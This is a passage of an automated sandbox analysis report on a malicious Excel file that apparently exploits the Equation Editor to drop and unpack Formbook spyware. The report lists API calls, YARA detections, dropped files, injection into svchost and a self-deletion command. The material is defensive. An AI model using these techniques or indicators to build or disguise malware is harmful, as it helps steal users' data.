            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008DFBB8 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008DFB50 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008DFB68 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008DFC60 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008DFD8C NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008DFDC0 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008DFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008DFFB4 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008E10D0 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008E0048 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008E0060 NtQuerySection,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008E0078 NtResumeThread,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008E01D4 NtSetValueKey,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008E010C NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008E1148 NtOpenThread,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008DF8CC NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008DF938 NtWriteFile,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008E1930 NtSetContextThread,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008DFA20 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008DFA50 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008DFBE8 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008DFC90 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008DFC30 NtOpenProcess,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008DFC48 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008E0C40 NtGetContextThread,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008E1D80 NtSuspendThread,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008DFD5C NtEnumerateKey,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008DFEA0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008DFE24 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008DFFFC NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008DFF34 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_000981D0 NtCreateFile,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00098280 NtReadFile,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00098300 NtClose,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_000983B0 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_000981CE NtCreateFile,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0009827C NtReadFile,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_000982CA NtReadFile,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_000982FA NtClose,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_000983AA NtAllocateVirtualMemory,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002D642C
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002D6008
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002D0560
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002D21D0
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002D36AA
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002D0D0A
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002DAD71
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002D4A40
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002D4A50
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00401030
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C6B
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C70
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BCF9
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D8F
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D90
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C5AF
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B79D
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB0
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BFB7
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C2E0C6
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C33040
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C4905A
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00CAD06D
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C5D005
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C2E2E9
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00CD1238
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C2F3CF
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C563DB
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00CD63BF
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C37353
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C7A37B
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C32305
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C65485
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C41489
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C6D47D
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00CB443E
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00CB05E3
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C4C5F0
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C76540
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C3351F
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C3E6C1
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C34680
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00CD2622
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C7A634
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C657C3
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00CB579A
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C3C7BC
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00CAF8C4
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00CCF8EE
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C3C85C
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C5286D
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C469FE
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00CD098E
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C329B2
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00CB394B
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00CB5955
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00CE3A83
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00CB6BCB
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00CBDBDA
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C2FBD7
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00CDCBA4
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C57B00
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00CCFDDD
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C3CD5B
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C60D3B
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C4EE4C
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C62E2F
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00CA2FDC
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00CCCFB1
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C5DF7C
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C40F3F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008EE0C6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0091D005
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0090905A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008F3040
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0096D06D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008EE2E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00991238
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_009963BF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008EF3CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_009163DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008F2305
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008F7353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0093A37B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00925485
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00901489
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0097443E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0092D47D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0090C5F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_009705E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008F351F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00936540
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008F4680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008FE6C1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0093A634
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00992622
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0097579A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008FC7BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_009257C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0096F8C4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0098F8EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008FC85C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0091286D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0099098E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008F29B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_009069FE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00975955
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0097394B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_009A3A83
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0099CBA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0097DBDA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008EFBD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00917B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0098FDDD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00920D3B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008FCD5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00922E2F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0090EE4C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0098CFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00962FDC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00900F3F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0091DF7C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0009C5AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0009B79E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00088C6B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00088C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0009BCF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00082D8F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00082D90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00082FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0009BFB7
            Source: P. I.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 008EE2A8 appears 38 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0095F970 appears 84 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0093373B appears 245 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00933F92 appears 132 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 008EDF5C appears 121 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 00C2E2A8 appears 38 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 00C9F970 appears 84 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 00C2DF5C appears 123 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 00C7373B appears 245 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 00C73F92 appears 132 times
            Source: 00000004.00000002.2139352712.0000000003361000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.2139352712.0000000003361000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.2139456624.00000000033DB000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.2139456624.00000000033DB000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.2188116011.0000000000380000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.2188116011.0000000000380000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.2187983316.00000000001B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.2187983316.00000000001B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.2350004296.0000000000120000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.2350004296.0000000000120000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.2349968714.00000000000B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.2349968714.00000000000B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: vbc[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: explorer.exe, 00000006.00000000.2152230582.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@9/6@7/7
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$P. I.xlsxJump to behavior
            Source: C:\Users\Public\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\TWeFoZCBhuuDrspdwLO
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD548.tmpJump to behavior
            Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: P. I.xlsxReversingLabs: Detection: 31%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
            Source: unknownProcess created: C:\Users\Public\vbc.exe {path}
            Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe {path}
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: wntdll.pdb source: vbc.exe, svchost.exe
            Source: Binary string: svchost.pdb source: vbc.exe, 00000005.00000002.2188179279.00000000004C9000.00000004.00000020.sdmp
            Source: P. I.xlsxInitial sample: OLE indicators vbamacros = False
            Source: P. I.xlsxInitial sample: OLE indicators encrypted = True

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: vbc[1].exe.2.dr, SimpleTickerWindowsForms/SimpleTickerView.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: vbc.exe.2.dr, SimpleTickerWindowsForms/SimpleTickerView.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.2.vbc.exe.b80000.3.unpack, SimpleTickerWindowsForms/SimpleTickerView.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.0.vbc.exe.b80000.0.unpack, SimpleTickerWindowsForms/SimpleTickerView.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.2.vbc.exe.b80000.1.unpack, SimpleTickerWindowsForms/SimpleTickerView.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.0.vbc.exe.b80000.0.unpack, SimpleTickerWindowsForms/SimpleTickerView.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002D767A push ds; retf
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002D9AC2 push ebp; ret
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C96A push ecx; ret
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004151BF push ss; iretd
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B3C5 push eax; ret
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B47C push eax; ret
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B412 push eax; ret
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B41B push eax; ret
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00409DE2 pushfd ; iretd
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C2DFA1 push ecx; ret
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008EDFA1 push ecx; ret
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_000951BF push ss; iretd
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0009B3C5 push eax; ret
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0009B41B push eax; ret
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0009B412 push eax; ret
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0009B47C push eax; ret
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0009C96A push ecx; ret
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00089DE2 pushfd ; iretd
            Source: initial sampleStatic PE information: section name: .text entropy: 7.44406855535
            Source: initial sampleStatic PE information: section name: .text entropy: 7.44406855535
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

            Boot Survival:

            barindex
            Drops PE files to the user root directoryShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Users\Public\vbc.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ASP.NET_4.0.30319\NamesJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
